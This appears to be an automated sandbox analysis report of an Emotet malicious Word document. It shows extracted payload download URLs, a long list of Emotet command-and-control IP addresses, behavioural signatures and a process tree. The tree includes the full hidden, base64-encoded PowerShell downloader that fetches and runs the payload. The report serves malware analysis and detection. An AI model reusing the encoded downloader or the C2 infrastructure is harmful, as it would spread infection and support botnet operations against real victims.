Analysis
-
max time kernel
26s -
resource
win10v191014 -
submitted
15-01-2020 22:47
General
Malware Config
Extracted
http://lehraagrotech.com/wp-content/B/
http://emdgames.com/calendar/xos/
http://seca.infoavisos.com/wp-seca/f/
http://arx163.com/wp-admin/uw4/
http://youthplant.org/wp-admin/838/
Extracted
emotet
24.196.49.98:80
93.147.141.5:443
72.189.57.105:80
91.250.96.22:8080
37.187.72.193:8080
104.131.44.150:8080
167.71.10.37:8080
27.109.153.201:8090
105.247.123.133:8080
190.12.119.180:443
120.151.135.224:80
221.165.123.72:80
103.86.49.11:8080
178.237.139.83:8080
5.32.55.214:80
95.213.236.64:8080
189.203.177.41:443
78.24.219.147:8080
190.117.226.104:80
73.11.153.178:8080
195.244.215.206:80
192.241.255.77:8080
24.105.202.216:443
50.116.86.205:8080
41.60.200.34:80
70.175.171.251:80
182.176.132.213:8090
45.51.40.140:80
201.184.105.242:443
47.180.91.213:80
159.65.25.128:8080
173.21.26.90:80
79.159.249.152:80
66.34.201.20:7080
62.75.187.192:8080
180.92.239.110:8080
178.153.176.124:80
115.95.6.218:443
24.94.237.248:80
181.143.126.170:80
210.6.85.121:80
197.89.27.26:8080
98.30.113.161:80
201.173.217.124:443
98.174.166.205:80
91.205.215.66:443
2.237.76.249:80
92.222.216.44:8080
209.97.168.52:8080
200.21.90.5:443
66.7.242.50:8080
5.154.58.24:80
31.31.77.83:443
59.103.164.174:80
37.157.194.134:443
110.36.217.66:8080
46.105.131.87:80
181.126.70.117:80
209.146.22.34:443
160.16.215.66:8080
5.196.74.210:8080
190.146.205.227:8080
169.239.182.217:8080
190.220.19.82:443
121.88.5.176:443
104.131.11.150:8080
190.53.135.159:21
200.116.145.225:443
47.6.15.79:80
87.106.139.101:8080
91.73.197.90:80
24.164.79.147:8080
139.130.242.43:80
62.75.141.82:80
58.171.42.66:8080
62.138.26.28:8080
211.63.71.72:8080
190.117.126.169:80
47.6.15.79:443
78.189.180.107:80
173.66.96.135:80
108.191.2.72:80
47.156.70.145:80
183.102.238.69:465
46.105.131.69:443
64.53.242.181:8080
78.186.5.109:443
205.185.117.108:8080
201.229.45.222:8080
209.141.54.221:8080
110.142.38.16:80
110.143.84.202:80
70.169.53.234:80
98.156.206.153:80
85.67.10.190:80
78.142.114.69:80
179.13.185.19:80
120.150.246.241:80
223.197.185.60:80
139.130.241.252:443
88.249.120.205:80
206.81.10.215:8080
31.172.240.91:8080
206.189.112.148:8080
72.186.137.156:80
104.236.246.93:8080
186.86.247.171:443
45.33.49.124:443
105.27.155.182:80
176.106.183.253:8080
177.239.160.121:80
95.128.43.213:8080
47.153.183.211:80
149.202.153.252:8080
190.55.181.54:443
87.106.136.232:8080
37.139.21.175:8080
60.231.217.199:8080
108.179.206.219:8080
87.230.19.21:8080
70.46.247.81:80
217.160.182.191:8080
188.0.135.237:80
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4064 Powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4064 wrote to memory of 4628 4064 Powershell.exe 80 PID 4628 wrote to memory of 4704 4628 919.exe 81 PID 4300 wrote to memory of 4280 4300 footerdispid.exe 83 -
Executes dropped EXE 4 IoCs
pid Process 4628 919.exe 4704 919.exe 4300 footerdispid.exe 4280 footerdispid.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4064 1940 Powershell.exe 74 -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4896 WINWORD.EXE 4628 919.exe 4704 919.exe 4300 footerdispid.exe 4280 footerdispid.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4064 Powershell.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 4704 919.exe 4280 footerdispid.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File renamed C:\Users\Admin\919.exe => C:\Windows\SysWOW64\footerdispid.exe 919.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4896 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\54549c77150daeca5c7ccf7fe8c079fb75dc0640bd64cdb6f0295f9c2382e4c2.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
PID:4896
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABWAGsAYgBtAGQAawBsAGwAegBtAHUAaAB5AD0AJwBUAHAAcQBhAGEAdQBtAHcAdQAnADsAJABOAGwAcQB2AG0AeABiAGcAIAA9ACAAJwA5ADEAOQAnADsAJABYAHcAbABxAGQAYgBiAHoAYQA9ACcAWgBjAGkAeABnAGsAagBmAG4AdwAnADsAJABLAHoAYQB1AGwAcgB3AGQAbgB0AGkAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgBsAHEAdgBtAHgAYgBnACsAJwAuAGUAeABlACcAOwAkAEgAawBmAHgAZgBpAG4AaABvAGgAZABvAD0AJwBWAHEAZgB4AHUAZQBlAGYAcgB5AHMAJwA7ACQATgBkAGEAeABtAGkAZAB1AD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAEMATABpAGUATgBUADsAJABFAGgAegBvAHEAbABtAHUAbwA9ACcAaAB0AHQAcAA6AC8ALwBsAGUAaAByAGEAYQBnAHIAbwB0AGUAYwBoAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AQgAvACoAaAB0AHQAcAA6AC8ALwBlAG0AZABnAGEAbQBlAHMALgBjAG8AbQAvAGMAYQBsAGUAbgBkAGEAcgAvAHgAbwBzAC8AKgBoAHQAdABwADoALwAvAHMAZQBjAGEALgBpAG4AZgBvAGEAdgBpAHMAbwBzAC4AYwBvAG0ALwB3AHAALQBzAGUAYwBhAC8AZgAvACoAaAB0AHQAcAA6AC8ALwBhAHIAeAAxADYAMwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdQB3ADQALwAqAGgAdAB0AHAAOgAvAC8AeQBvAHUAdABoAHAAbABhAG4AdAAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AOAAzADgALwAnAC4AIgBTAFAATABgAEkAVAAiACgAJwAqACcAKQA7ACQATQBsAHMAagBrAGgAZABkAGcAPQAnAFYAcQBuAGkAdgBzAHoAdABpACcAOwBmAG8AcgBlAGEAYwBoACgAJABTAHQAegBsAGkAeABzAGoAIABpAG4AIAAkAEUAaAB6AG8AcQBsAG0AdQBvACkAewB0AHIAeQB7ACQATgBkAGEAeABtAGkAZAB1AC4AIgBkAGAATwBXAG4ATABgAG8AYQBkAEYASQBsAGUAIgAoACQAUwB0AHoAbABpAHgAcwBqACwAIAAkAEsAegBhAHUAbAByAHcAZABuAHQAaQBmACkAOwAkAFMAegBwAGMAawBvAGMAdABoAGUAagA9ACcAVgB2AHgAcwBnAGwAagBwACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQASwB6AGEAdQBsAHIAdwBkAG4AdABpAGYAKQAuACIATABlAGAATgBgAEcAVABIACIAIAAtAGcAZQAgADMANAA2ADIAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABLAHoAYQB1AGwAcgB3AGQAbgB0AGkAZgApADsAJABFAHIAdgBqAHkAeQB5AG8APQAnAFMAcwB0AGkAdwBwAGIAbQBxAHoAbQBuAG0AJwA7AGIAcgBlAGEAawA7ACQAVgBnAG4AeABpAHoAegB5AG4AeAB0AHQAcwA9ACcARwB1AHAAYwBkAGQAZABqAGsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBjAGIAcABxAGUAaQBqAGQAPQAnAFEAZQB5AHMAdQBnAGsAZAB2AGkAJwA=1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
PID:4064 -
C:\Users\Admin\919.exe"C:\Users\Admin\919.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4628 -
C:\Users\Admin\919.exe--19646a5f3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:4704
-
-
-
C:\Windows\SysWOW64\footerdispid.exe"C:\Windows\SysWOW64\footerdispid.exe"1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4300 -
C:\Windows\SysWOW64\footerdispid.exe--86b9e32a2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
PID:4280
-